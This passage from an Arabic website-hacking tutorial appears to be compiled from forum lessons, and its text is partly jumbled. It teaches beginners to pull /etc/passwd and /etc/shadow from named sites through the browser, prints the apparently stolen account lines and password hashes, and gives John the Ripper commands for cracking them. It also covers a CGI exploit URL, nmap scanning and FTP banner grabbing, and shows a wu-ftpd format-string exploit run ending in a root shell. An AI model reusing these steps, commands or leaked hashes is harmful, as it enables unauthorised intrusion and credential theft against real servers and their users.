‫الموقع ‪ /./.../..././../.Cgi‬الموجوده في الموقع ‪ ،‬هذا إذا وجد شئ منها‬ ‫‪ -4‬ولتنسى تحط البورتات معها ‪ ،‬لنه أحيانا يكون في البورت نقطه ضعف ‪ ،‬ليس هذا صحيحا ‪%100‬‬ ‫نقطه الضعف ليست في البورت بعينه ‪ ،‬في البرنامج اللي مصلح إنصات للبورت )هذا أقرب تعبير لها(‬ ‫‪ -5‬أخيرا يمكنك الستفاده من المعلومات التي حصلت عليها في البحث عن نقاط ضعف )يوجد في آخر هذا‬ ‫المستند مواقع من ظمنها مواقع تحتوي على أرشيفات قد تفيدك في الحصول على الثغرات(‬ ‫ كيف يمكن إستغلل نقاط الضعف المكتشفه ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫أبسط الثغرات والتي يستطيع أي مبتدي أن يستخدمها هي تلك التي تنفذ من خلل المتصفح ‪ ،‬مثل المثال‬ ‫السابق ذكره لختراق الموقع ‪/http://www.././‬فقط ‪ ،‬هل عرفت ما تعرض لك هذه الخيره !‬ ‫الن سوف أضع النقاط الساسيه لكشف نقاط ضعف على موقع ما ‪-:‬‬ ‫‪ -1‬التعرف على كافه الخدمات الموجوده على السيرفر‬ ‫‪ -2‬معرفه نظام التشغيل وإصدارته وكذلك ملقم الويب وأي برمجيات أخرى مثل مفسر نصوص بيرل إذا كان‬ ‫ذلك ممكن ‪ ،‬أو برنامج للبيع والشراء ‪./...../..‬وتعمل تحت بيئه ليونكس ‪ ،‬وهذا النوع‬ ‫من الستثمارات هو المفضل ويحسس المخترق بالقوه ونظرا لتعدد الداوت في ليونكس فإن لغه ‪shell‬‬ ‫اصبحت قويه فهي تقابل كتابه ملف دفعاتي في ويندوز )‪(bat‬‬ ‫‪197‬‬ .timduff.

‬وليس *‪ ، C.‫ويوجد نوع من الستثمارات ثاني وهو شفره )كود( مكتوب بلغه ‪ C‬المشهوره ‪ ،‬وهذا النوع غالبا ما تحدث‬ ‫فيه أخطأ أثناء عمليه الترجمه ‪ ،‬قد تواجه كثير من المتاعب لذلك يجب أن تكون لديك خلفيه في لغه سي ‪،‬‬ ‫ولترجمه هذا النوع عليك بالذهاب الى ليونكس وترجمته بإستخدام المترجم ‪gcc‬‬ ‫‪gcc Exploit.‬لو كان حرف ‪ c‬كبتل فسوف يترجم‬ ‫الستثمار وكأنه كتب في سي ‪ ، ++‬الشئ الثاني تأكد من توفر المكتبات )*‪ (h.c -o Exploit‬‬ ‫ملحظه مهمه ) يجب أن يكون المتداد للمف *‪ c.‬‬ ‫‪ = Exploit‬إستثمار‬ ‫ ماهو ملف كلمة المرور ‪ password file‬؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫ملف كلمة المرور معروف من إسمه ‪ ،‬هو الذي في داخله توجد حسابات الشخاص المرخص لهم بالدخول‬ ‫الى السيرفر ‪ ،‬مثل هذا‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬ ‫‪Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:‬‬ ‫‪noaccess:x:60002:60002:No Access User:/:‬‬ ‫‪nobody4:x:65534:65534:SunOS 4.‬التي يتطلبها الستثمار قبل‬ ‫تشغيله(‬ ‫عليك زياره موقعي فهناك مستندات في البرمجه قد تنفعك‬ ‫يوجد نوع ظهر مؤخرا من الستثمارات وبداء ينتشر وهو أيضا شفره ولكن مكتوبه بلغه ‪ Perl‬ومن الممكن‬ ‫أن يتم تشغيل هذا النوع من موجه الدوس في ويندوز )يجب أن تملك برنامج يفسر شفرات البيرل مثل أكتيف‬ ‫بيرل(‬ ‫وأحيرا انواع نادره من الستثمارات قد تكون على شكل خطوات ‪..x Nobody:/:‬‬ ‫‪www:x:102:1001::/web:/bin/csh‬‬ ‫‪mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu‬‬ ‫‪sid:x:103:10::/export/home/sid:/bin/ksh‬‬ ‫‪mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh‬‬ ‫‪jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh‬‬ ‫‪198‬‬ ...

.com‬‬ ‫تفسير هذا السطر ‪-:‬‬ ‫‪root:x:0:1:Super-User:/:/sbin/sh‬‬ ‫‪root‬‬ ‫هذا السطر يوضخ المستخدم واللي هو الجذر ‪root‬‬ ‫‪199‬‬ ......‬‬ ‫كلمة المرور تكون مشفره ‪ ،‬ل هذا ليس صحيحا تماما ‪ ،‬كانت مشفره زمان ولكن في الوقت الحالي هي‬ ‫مضلله‬ ‫*او ‪ = x‬كلمة سر مضلله ‪Shadowed‬‬ ‫‪ = EpGw4GekZ1B9U‬كلمة سر مشفره على مقياس ‪ ، DES‬هذا النوع من التشفير المستخدم في‬ ‫ليونكس و ‪ FreeBSD‬وعدد من النظمه الخرى ضعيف ‪ ،‬وهو دائما مكون من ‪ 13‬حرف ورقم كبتل‬ ‫وسمول ول يحتوي من بينها على رمز ابدًا ‪ ،‬بإستثناء ويندوز فهو يستخدم نوع آخر من التشفير وهو نوع‬ ‫ضعيف أيضا‬ ‫ كيف يمكن معرفة كلمة السر من خلل ملف الباسورد ‪ password file‬؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~~~~~~~~~~~~‬ ‫إضغط ‪ Ctrl + Shift‬في القسم اليمن من لوحه المفاتيح لتقراء من اليسار الى اليمين ‪ ،‬ثم إذهب الى‬ ‫العلى حيث وضعت مثال لملف كلمة مرور تم سحبه من الموقع ‪.. hwwilson...‫‪landmark:x:1000:1000::/web/landmark:/bin/ksh‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫وقد تكون أكثر بكثير ‪ ،‬حيث أن هذا الملف الموضح بالعلى أختصر بشكل كبير ‪ ،‬فعند سحبه كان يحتوي على‬ ‫آللف السطور ‪ ،‬ليس كل ملفات كلمات المرور بهذا الحجم فيوجد منها من ل يتجاوز ‪ 10‬أسطر وهي‬ ‫الموجوده بكثره ‪ ،‬على العموم أنت الحين عليك تعرف بأن ملف كلمة المرور هو الذي في داخله توجد‬ ‫حسابات الشخاص المرخص لهم بالدخول الى السيرفر ‪.‬‬ ‫ بماذا يفيدني هذا الملف ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫يفيدك يا الحبيب في معرفه كلمات السر وإسماء المستخدمين لكي تقوم بإختراق الموقع ‪ ،‬ولكن لتفرح ‪!.

‬‬ ‫ وماذا لو كان ملف كلمة المرور مشفر ‪ ،‬كيف يتم كسره ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~~‬ ‫البرامج كثيره وأشهرها هو ‪ Crack 5..‬‬ ‫طريقه عمل هذه البرامج ‪-:‬‬ ‫يقدم للبرنامج ‪ wordlist‬ويقوم بمطابقه الكلمات الموجوده به ‪ ،‬كما هو موضح هنا ‪..‫‪x‬‬ ‫وكلمة المرور ‪ ،‬ويتضح انها مضلله ‪ ،‬يعني مكانها العلمة ‪ ، x‬ل تفكر في كسرها فهذا مستحيل ‪ ،‬لكن عليك‬ ‫البحث عن ملف ثاني تم تخزين فيه كلمة المرور ‪ ،‬ستعرف بعد قليل كيف تفعل هذا‬ ‫‪0‬‬ ‫هذا هو رقم المستخدم‬ ‫‪1‬‬ ‫رقم المجموعه‬ ‫‪Super-User:/:/sbin/sh‬‬ ‫هذا مش مهم‬ ‫‪++++++++++++++++++++++++++++‬‬ ‫الجزء الثالث‬ ‫ ماالفرق بين إذا كان الملف )مشفر ‪ (encryption‬وإذا كان )مضلل ‪ (shadowed‬؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~~~~~~~~~~~~~~~~~~~~~~‬ ‫الملف المضلل ‪ shadow file‬يكون مكان كلمة المرور رمز مثل * أو ‪ x‬أو ‪ #‬أو ! وهذا مثال لها‬ ‫‪root:x:0:1:Super-User:/:/sbin/sh‬‬ ‫لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه‬ ‫‪root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh‬‬ ‫هنا تكون كلمة المرور المشفره هي ‪Q71KBZlvYSnVw‬‬ ‫الن طلعت الصوره صافيه ‪.0a‬و ‪ john the ripper‬ويوجد آخر بإسم ‪jack the ripper‬‬ ‫‪ ،‬إذا كنت ممن يجيدون العمل في ليونكس فهذا جيد ‪ ،‬عليك تنزيل ‪ ، Crack 5a‬وأفضل ‪john the‬‬ ‫‪ ripper‬لمن يريد إستخدام ويندوز ‪ ،‬وللمعولميه فإن ‪ john the ripper‬عمل أيضا تحت ليونكس ‪...‬‬ ‫‪200‬‬ ....

.‫‪\ -----------------------------------------------------------------------------------------------‬‬‫‪------> Q2wrtUo9LPq2R‬‬ ‫يتم مقارنه | ‪} ---> //‬البدايه{ كلمة المرور | ‪ /---/‬المشفره مع | ‪ / 1 /‬أخذ كلمة من الـ ‪ wordlist‬الكلمات‬ ‫| ‪ _____________ / 0 /‬المختاره حتى | }تشفير{‪ | | / 1 /‬يتم ‪|----\ / 0 / ---------^--------‬‬ ‫‪ | word list‬التطابق ‪-> Q6LiJ6ct1oUBz‬كلمة مرور مشفره ‪ /---/‬الكلمة المختاره | |‬ ‫_____________| ‪ \ ------song--------// ------------------‬إذا حدث تطابق فهذا يعني أن‬ ‫كلمة المرور التي كانت مشفره‬ ‫قد كسرت ‪.3 Copyright (c) 1996‬‬ ‫‪Loaded 1 password‬‬ ‫**‪v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬ ‫<‪E:\Desktop\junk\john the ripper‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫وسوف تحفظ النتيجه في الملف ‪ john.txt‬‬ ‫‪by Sola 97.pot‬الموجود في نفس الدايروكتري ‪ ،‬وعليك حذف هذا الملف إذا‬ ‫أردت البدء في عمليه كسر جديده ويمكنك تغيير إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى‬ ‫ذلك ‪.‬الخ حتى تصيب كلمة المرور الصحيحه ‪ ،‬وأنا افضل ان تستخدم ملفات ‪ wordlist‬فذلك لن يأخذ‬ ‫معك في ال ثواني فقط لن عمليه التجربه الموضحه في الرسم بالعلى ذكرت بأنه سرعة تجربه الكلمات‬ ‫يتجاوز ‪ 5000‬كلمة في الثانيه ‪ ،‬إذا لم تفلح ملفات ‪ wordlist‬حينها إذهب الى القوه العنيفه ‪brute‬‬ ‫‪force‬‬ ‫المر التالي يجعل ‪ john the ripper‬يستخدم طريقه ‪ brute force‬السابق ذكرها‬ ‫‪john -i passwd‬‬ ‫‪201‬‬ ..C)Copyright Microsoft Corp 1981-1998‬‬ ‫‪E:\Desktop\junk\john the ripper>john -w asswd passwd.‬‬ ‫| ‪ | -------------------------------------------------------------------------------‬ملحظه مهمه ‪ -:‬يتم‬ ‫عمل دوره مثل الموضحه في العلى لكسر كلمات المرور المشفره بسرعه‬ ‫}النهايه{ | ‪ 5000‬تجربه في الثانيه )إختبرنا ‪john the ripper‬على معالج بسرعه ‪(700‬‬ ‫| ‪-------------------------------------------------------------------------------‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫هذه الرسمه تعبت عليها عشان كذا ل أحد يسرقها‬ ‫لتشغيل ‪ john the ripper‬من واجه دوس نكتب المر التالي‬ ‫‪john -w:wordlist passwd‬‬ ‫حيث ‪ wordlist‬هو ملف القاموس الذي يحتوي على عدد كبير من الكلمات‬ ‫و ‪ passwd‬هو الملف الذي يحتوي على كلمات المرور المشفره والتي نود معرفتها‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪Microsoft(R) Windows 98‬‬ ‫‪)...‬‬ ‫هناك طريقه اخرى للكسر وهي تسمى بـ ‪ brute force‬أو بالعربي القوه العنيفه ‪ ،‬وهي ل تحتاج لملف‬ ‫‪ ، wordlist‬هي تقوم بتجربه كل الحروف والرقام والرموز مع بعض في خانتان و ‪3‬خانات واربع‬ ‫وخمس ‪.John the Ripper Version 1.

‬‬ ‫هذا ملف باسورد حصلنا عليه من ‪http://wilsonweb2.com/etc/passwd‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬ ‫‪202‬‬ .‬‬ ‫ ولو كان ملف كلمة المرور مضلل ‪ ،‬ماذا علي ان أعمل ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~‬ ‫دائما سوف تواجه كلمة مرور مضلله ‪ ،‬لكن هناك طريقه تسمى ‪ Unshadow‬لحل هذه المشكله !!‬ ‫إذا واجهت ملف مضلل عليك البحث عن ملف ثاني يسمى ملف الشادو )ملف الظل( ‪shadow file‬‬ ‫وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ‪ ،‬اليك الجدول التالي ‪:‬‬ ‫‪* = Linux : /etc/shadow token‬‬ ‫‪ = SunOS : /etc/shadow token‬يأخذ أشكال متعدده اشهرها هو *‬ ‫‪ * = FreeBSD : /etc/master..hwwilson....passwd or /etc/shadow token‬والجديد هو ‪x‬‬ ‫‪IRIX : /etc/shadow token = x‬‬ ‫‪! = AIX : /etc/security/passwd token‬‬ ‫‪* = ConvexOS : /etc/shadow or /etc/shadpw token‬‬ ‫‪ token‬تعني الرمز الذي يوجد في الملف ‪ ، passwd‬وهذا يفيد في تسهيل المهمه ‪ ،‬يعني لو مثل لقيت‬ ‫علمه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في ‪ ، etc/security/passwd/‬لقد‬ ‫إستعنت بالجدول السابق ذكره ‪ ،‬مثال على ملف شادو )أكرر ملف شادو هو الملف الذي تخزن فيه كلمة‬ ‫المرور الصحيحه(‬ ‫هذا ملف ‪shadow‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445‬‬ ‫‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::‬‬ ‫‪::::::lp:NP:6445‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫نلحظ ان كلمات السر موجوده‬ ‫الخطوه الخيره وهي دمج ملف الباسورد ‪ passwd file‬مع ‪ shadow passwd‬لنحصل على ملف‬ ‫متكامل ونقدمه الى برامج الكسر السابق ذكرها‪.‫حيث ‪ passwd‬هو ملف كلمة المرور المراد كسره ‪ ،‬إذا قمت بتجربه هذه الطريقه إضغط إنتر أثناء عمل‬ ‫البرنامج لترى الى أين توصل ‪.

gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976:::::: ::::::erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185 -----------------------------------------------------------------------------------------------‫ وهكذا مع جميع الحسابات‬، ‫ في ملف الباسورد‬x ‫نقوم بنسخ كلمات السر الموجوده فيه ولصقها مكان علمه‬ ‫لنحصل على ملف لمة مرور كامل ومتكامل ونقدمه الى برامج الكسر‬ -: ‫ملحظه مهمه‬ .ussrback.x Nobody www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh -----------------------------------------------------------------------------------------------‫ نعرف من خلل الجدول السابق ذكره بأن كلمة المرور الصحيحه في‬x ‫ الموضح واللي هو‬token ‫ومن الـ‬ etc/shadow/ ‫الدليل‬ ‫إذن نتوجه بالمتصفح الى‬ http://wilsonweb2.com/etc/shadow ‫لنحصل على الملف‬ -----------------------------------------------------------------------------------------------root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: www:WJctaI..com/exploits/archive..Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: :/:nobody4:x:65534:65534:SunOS 4.html ‫أرشيف لثغرات‬ /http://www.securiteam.com ‫ الكثير‬+ ‫أرشيف ثغرات‬ /http://www.8rcSe2:10507:::::: mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.secureroot.hwwilson.com 203 . ‫ يعني تربتها لتتعرف عليها برامج الكسر‬، ‫عليك جعل كل حساب في سطر‬ -: ‫مواقع تستحق الزياره‬ ‫أرشيف لثغرات‬ www.

neworder.bugs2k..com ‫مواقع لثغرات‬ www.warez..insecure.com insecure /http://www..easynet.com Hacking (‫(ممتاز لمن يريد البدايه‬ /http://www.uk/cgi.pl ،،،‫انتهى‬ " (‫" اختراق المواقع )الجزء الثالث‬ 204 .co.rootshell.hitboss.sk Security Search Engine /http://www.com ‫أرشيف ثغرات‬ /http://www.com/category/exploits ‫دليل لمواقع الهاكينق‬ www.ussrback.com/resources/s.box.ail/formmail.www.org <XMP></BODY></HTML/> http://public.com/Hacking ‫محرك بحث ل غني عنه‬ www.asp Warez.ound/search..secureroot.undergroundnews.‫أرشيف ثغرات‬ /http://www.com-Underground /http://www.

‬‬ ‫في الحقيقه موضوع الثغرات بسيط جدا مثل ما انا قريت عنه بس‬ ‫يبي متابعه وشوية جهد انا ساطرح بعض السئله لعل الخوان المشرفين‬ ‫او الكتاب يساعدونا في الموضوع ‪.‬‬ ‫من خلل قرائتي للعديد من تكست الثغرات رغم قدامتها تبين لي عدة امور‬ ‫* لن تخترق الموقع )‪ (host‬اللي مستضيفه السيرفر حتى تمتلك اليوزر والباسوور وهذا شيء طبيعي‬ ‫* لن تخترق السيرفر حتى تمتلك ملف الصلحيات )‪ (passwd‬اللي هو حق الحسابات للمواقع المستأجره‬ ‫عند السيرفر بس سؤالي اللي محيرني ان الملف واقع تحت مجلد اسمه اي تي سي ‪/etc/passwd‬‬ ‫احيان يكون اسمه ‪ shadow‬ويعني ان كلمة المرور نجمه او اكس او علمة تعجب اما ‪ passwd‬فتأتي‬ ‫فيه‬ ‫الكلمه مشفره وتستخدم لها ‪ john the ripper‬اللي يفك تشفيرها طبعا ملفات الشادو مالك امل للحين‬ ‫على حسب علمي مافيه برنامج لها ؟؟؟‬ ‫فيه سؤال هنا اللي نعرفه ان كل ملف له امتداد بس ليش الملف ذا ماله امتداد ؟‬ ‫واذا حصلت الملف باي طريقه كانت ؟؟ باي صيغه احفظه هل يحفظ كتكست ام )‪ (pwd‬او )اي صيغه( ؟‬ ‫بعدين فيه سؤال ثاني المجلد اللي فيه الملف من مجلدات اليونكس ؟ لنه كما معروف ان اليونكس‬ ‫له ست مجلدات‬ ‫‪ bin‬خاص بالملفات الثنائيه يعني اللي تشغل النظام‬ ‫‪ etc‬ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او ‪passwd‬‬ ‫‪ dev‬ملفات الجهزه‬ ‫‪ lib‬مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل‬ ‫‪ tmp‬الملفات الموقته او غير الثابته‬ ‫‪ usr‬اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام‬ ‫هل يعني ذلك لو ان السيرفر فيه نظام ‪ nt‬اقدر انزل الملف منه ؟ وان المجلدات نفسها اللي باليونكس‬ ‫‪205‬‬ .....‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬ ‫اخواني عالم الختراق كبير جدا ‪..‬فليس عيبا طلب العلم‬ ‫انما العيب الجهل والتعالي بالعلم نحن نتعلم ل لنجابه العلماء بل‬ ‫لننفع امتنا ونرفع رايتها ونقف في وجه من يعاديها ‪....‬وبسيط جدا جدا لنه من صنع البشر‬ ‫كوني احد العضاء في هذا المنتدى وجديد في باب الختراق عن طريق الثغرات‬ ‫وحتى تحصل الفائده للجميع ونتعلم من بعض ‪...

jewish.cgi‬الكلم هذا كله في المستعرض عندك في حقل‬ ‫الدرس العنوان‬ ‫انا نسيت اقول حاجه ماني متأكد منها لعل من يعلق على الموضوع ان كانت غير صحيحه يصححها‬ ‫ان ممكن تكون الثغره بمجلد ثاني اسمه ‪ scripts‬وتصبح الثغره السابقه‬ ‫‪http://www.org/scripts/php.pwd‬مثل‬ ‫* بالنسبه لطريقة الثغرات تعني الطرق للوصول للملفات السابقه او ملفات اخرى‬ ‫ومن اشهرها ثغرات السي جي اي نسبة للمجلد ‪ cgi-bin‬او ملفات من امتداد ‪cgi‬‬ ‫ماعلينا ليش سموها ؟؟؟‬ ‫طيب وشلون نتعامل مع الثغره والموقع ببساطه شديده لنفترض ان لدينا ثغره ‪ php.‬‬ ‫انتهى‪،،،‬‬ ‫" درس في اختراق المواقع )متوسط( "‬ ‫‪206‬‬ .org‬نفعل التالي‬ ‫‪ /http://www.cgi‬ونريد‬ ‫تطبيقها على موقع ذو دومين نيم يعني مو مستضاف مثل ‪ /http://www.cgi‬‬ ‫‪ scripts‬خاص بسيرفرات فيها ‪winnt‬‬ ‫‪ cgi-bin‬خاص بسيرفرات يونيكس او ايريس او لينكس‬ ‫للمعلوميه المجلدات السابقه توضع فيها الملفات التنفيذبه من جهة السيرفر مثل البلت جافا‬ ‫اما ملفات السكربت جافا تنفذ على جهازك مثل اللي تطلع في المستعرض‪.org/cgi-bin/php.jewish.org‬ثم نكتب ‪ /cgi-bin‬ثم الثغره ‪ php.jewish.cgi‬بحيث تصبح الخطوات بعد‬ ‫تجميعها‬ ‫‪ http://www.jewish.‫زي اللي موجوده في ‪ nt‬ام تختلف واسم الملف يختلف ‪ admin.

‬اذا بحثت في جوجل سوف تجد الكثير من الشيلز‬ ‫طبعا الناس المحترمه )احمممم( بتركب لينكس او يونيكس و تعيش حياتها و تريح‬ ‫نفسها‪.. ping.‬‬ ‫*المواقع المرتبطه بالموضوع ‪:‬‬ ‫‪(a) Linux (http://www. (3‬‬ ‫‪-3‬شوف الموقع المستهدف و ليكن ‪. ssh.3‬‬ ‫المفروض انه يديك مخرجات شبه الكلم ده ‪-:‬‬ ‫‪root@IcEr:~# nmap -sS -O 196.tar.1.3‬‬ ‫‪( /Starting nmap V..com‬‬ ‫‪(b) Nmap (http://www..insecure.target.org/nmap‬‬ ‫‪:(Interesting ports on www.‬‬ ‫‪www.com/~weld/netcat‬‬ ‫الخطوات ‪-:‬‬ ‫‪ -1‬ركب الينكس و خش عالنت )مش قلتلك مفيش احسن من اللينكس ‪( P:‬‬ ‫‪ -2‬ركب الداه ‪ nmap‬متبعا التالي ‪:‬‬ ‫*‪tar zxvf nmap.1.target..3‬‬ ‫‪ -5‬شوف الخدمات اللي بيقدمها الموقع و كمان شوف نظام التشغيل متبعا التالي ‪-:‬‬ ‫"‪"nmap -sS -O 196.2. traceroute....org‬‬ ‫‪(/c) NetCat (http://www.2.com (196.com‬‬ ‫‪ -4‬شوف الي بي تبع الموقع باستخدام‬ ‫‪nslookup www.l0pht.target.2.1.. ftp‬‬ ‫و اساسي لزم ال ‪ gcc‬عشان تعرف تعمل كومبايل‪).2.1. 2..insecure.‬مش حناقش كيفيه‬ ‫الحصول على واحد لن فيه مواضيع كثيره اتكلمت عليه‪.‬دور و لو مالقيتش قولي و انا اديلك كام موقع‬ ‫تجيب منه الحاجات دي‪.gz (1‬‬ ‫‪cd nmap (2‬‬ ‫‪configure && make && make install/.‬في ناس تانيه ماتحبش اللينكس فالشيل اكاونت كويس لها و ممكن يمشي‬ ‫انا عن نفسي مش حاستعمل التنين ‪(:‬‬ ‫بس بالنسبه للي حيستعملو الشيل لزم يتاكدو انه بيسمح بالبرامج الساسيه زي‬ ‫‪nslookup...‬‬ ‫*بعض الملحوظات الهامه ‪:‬‬ ‫‪-1‬الشيل اكاونت شبيه جدا بالدوس مع اختلف في الوامر و الوظائف ‪. dig..‬‬ ‫‪ -2‬اداه ال ‪ nmap‬هي عباره عن بورت سكانر متقدم‬ ‫‪ -3‬ال ‪ NetCat‬هي اداه شبيه بالتلنت و تقوم برفع بيانات لسيرفير معين‬ ‫‪-4‬الكسبلويتات هي عباره عن برامج غالبا تكون مكتوبه بلغه السي و هي تقوم‬ ‫باعطائك كافه الصلحيات فهي تخترق جهاز معين و تقوم بعمل كل شيء انت تريده‬ ‫ممكن تلقيها فين؟؟؟‬ ‫مواقع السيكيوريتي على افه من يشيل‪.54BETA22 ( www. host.3‬‬ ‫)‪(The 1531 ports scanned but not shown below are in state: closed‬‬ ‫‪207‬‬ .‫>ةةةةة<‬ ‫>ةةةةةة‪< ICER :‬‬ ‫الدوات المطلوبه ‪ :‬شيل اكاونت ‪.‬يا عم ركب لينكس و ريح نفسك (‬ ‫و طبعا الدوات دي ‪ nmap and netcat‬و اخر حاجه هي الكسبلويت ‪.telnet..com‬‬ ‫هذا سوف يعرض لك الي بي للموقع و ليكن ‪196.slackware.

.3 .1.this will turn off the continuation messages that-230 may .3" ‫اي منهم حيديك بانر فيه الفيرجين بتاعه الف تي بي ديمون اللي شغاله على السيرفير‬ : ‫ممكن يكون زي كده‬ root@IcEr:~# ftp 196.‫نكمل‬ FTP ‫ممكن تشوف لو كان فيه‬.2.2..Guest login ok. archive user! This is an experimental FTP server.net If you do have problems.0(1) Mon Mar 6 13:54:16 220 (SAST 2000 . If have-230 any unusual problems.Port State Service tcp open ftp/21 tcp open smtp/25 tcp open http/80 tcp open sunrpc/111 tcp open auth/113 tcp open printer/515 tcp open unknown/963 tcp open kdm/1024 tcp filtered krb524/4444 tcp open X11/6000 tcp filtered napster/6699 OS guess for host: Linux 2.16 (Uptime 0.14-2.6.1.3 www. please try using a dash (-) as the first-230 character of your password -.2.1.pandora. send your complete e-mail address as password 331 :Password Welcome.‫الكلم ده كله عباره عن استكشاف للموقع يوريك البورتات المفتوحه‬ daemon ‫شغال على الموقع و ل ل في المثال اللي فوق حنلقيه موجود و ده كويس‬ -: ‫ موجوده متبعا التالي‬FTP daemon ‫شوف اي فيرحين من‬ "telnet 196..2.1 IP address (1 host up) scanned in 67 seconds #~:root@IcEr (: ‫تمام كده يا شباب‬ .Connected to 196.3 21" ‫او‬ "ftp 196.160 days (since Mon Apr 30 14:51:06 2001 Nmap run completed -.2. please report them via e-mail to-230 root@IcEr.ready Name (target:root): anonymous .target.be confusing your ftp client-230 -230 208 .2.1.com FTP server (Version wu-2.

‫طبعا انا نسيت امر الكومبايل‬ man gcc ‫بكل الخيارات اللي معاه‬.3 (ftp/<shellcode>): RedHat 6. ‫طيب‬ ‫لكن لو كانت الخاصيه‬... root@IcEr:~/# .za..Guest login ok. magic number already exists: [[87.02:01.. ‫ و كانت اعمليه ناجحه‬anonymous ‫و ايضا احنا حاولنا نخش كمجهولين‬ ####### ‫ صلي على الحبيب المختار‬####### -: ‫ مش فاكر المهم انها اهم خطوه‬8 ‫ او‬7 .Guest login ok.14-5.01:02.0 ‫من الكلم ده تقدر تعرف ان الفيرجين الموجوده هي‬ (..net 2.2.. send your complete e-mail address as password 331 <PASS <shellcode Next time please use your e-mail address as your password-230 for example: icer@ae.Using binary mode to transfer files ftp>by #~:root@IcEr .Remote system type is UNIX ..loggin into system USER ftp .1. this will take about 10 seconds Press ^\ to leave shell Linux lame_box. Shellcode: 152 .01:03. ‫و هوه حيديلك معلومات كامله عن امر الكومبايل‬ (: ‫كده يبقى انا كده عملت اللي عليه‬ ‫محدش يسالني باه بعد كده و يقولي ياواد يا ايسر اعمل ايه‬ search. ‫محدش سالني اعمل بالنت كات بعد كده‬.2 (?) with wuftpd 2.0(1) from rpm Return Address: 0x08075844..6.wu-2./wuftpd2600 -t -s 0 196.STEP 5 : Sending code.2..0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown (uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp !Bang! You have root ‫شوف المر ده‬.c ‫و لتكن‬ red hat 6.2.. access restrictions apply 230 STEP 2 : Skipping. AddrRetAddr: 0xbfffb028.3 Target: 196.04 STEP 3 : Checking if we can reach our return address by format string (STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now .1.6. access restrictions apply 230 . ‫اه نسيت‬.2 ‫المهم لو شفت السورس كود بتاعها حتلقي انها متكوده عشان نظام تشغيل معين و ليكن‬ ‫و يا سلم لو كان الموقع المستهدف بيعمل على 